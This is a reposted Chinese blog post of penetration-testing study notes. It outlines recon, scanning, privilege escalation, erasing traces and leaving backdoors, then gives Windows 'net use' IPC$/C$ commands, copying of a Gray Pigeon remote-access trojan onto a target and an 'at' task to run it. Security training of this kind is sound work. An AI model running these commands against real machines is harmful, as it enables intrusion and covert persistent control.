(更新时间)2021年4月25日 网络安全 渗透测试
发布日期:2021-06-29 15:15:54
浏览次数:2
分类:技术文章
本文共 583 字,大约阅读时间需要 1 分钟。
一:测试步骤
0.授权
1.信息收集
nslookup whois
2.扫描
namp=ip范围 端口 80(IIS,apache,什么网站)scanport
高级扫描:如IIS漏洞2003-IIS6.0 2008IIS7.0 扫描网站漏洞()3.利用
4.提权(shell环境、桌面环境、最高权限)
5.灭迹
6.留后门
7.渗透测试报告
二:具体流程
1.scanport扫描445端口
2.利用IPC$:
进行破解:NTscan3.相关命令行
=====================================net use f: \\10.1.1.2\share 密码 /user:用户net use f: /delnet use * /delnet use f: \\10.1.1.2\c$ 密码 /user:用户net use \\10.1.1.2\ipc$ 密码 /user:用户==========================================
4.制作
利用光盘上的灰鸽子软件5.植入(留后门)
copy d:\heihei.exe \10.1.1.2\c$6.设置计划任务自动执行:
net time \10.1.1.2 at \10.1.1.2 11:11 “c:\heihei.exe”7.等待客户机上线
转载地址:https://codeboy.blog.csdn.net/article/details/116126934 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!
发表评论
最新留言
关注你微信了!
[***.104.42.241]2024年04月28日 01时01分56秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
Mariadb基础管理
2019-04-29
awk 的内置变量 NF、NR、FNR、FS、OFS、RS、ORS
2019-04-29
CentOS系统内核升级攻略
2019-04-29
linux系统时区修改(Debian的主机和docker)
2019-04-29
docker-compose 安装
2019-04-29
crontab 定时任务
2019-04-29
查看docker veth pair与宿主机上网卡的对应关系
2019-04-29
使用 GitLab CI 进行持续集成的一些踩坑
2019-04-29
企业云盘给贸易业带来新的效益
2019-04-29
Linux入门常用命令
2019-04-29
Spring整理
2019-04-29
SpringMvc加强
2019-04-29
初识Vue全家桶 Nuxt.js(一)
2019-04-29
基本路由及动态路由(二)
2019-04-29
视图:默认模板+默认布局(自定义布局)+nuxt.js页面(三)
2019-04-29
基于nuxt下asyncData,fetch发送axios请求(四)
2019-04-29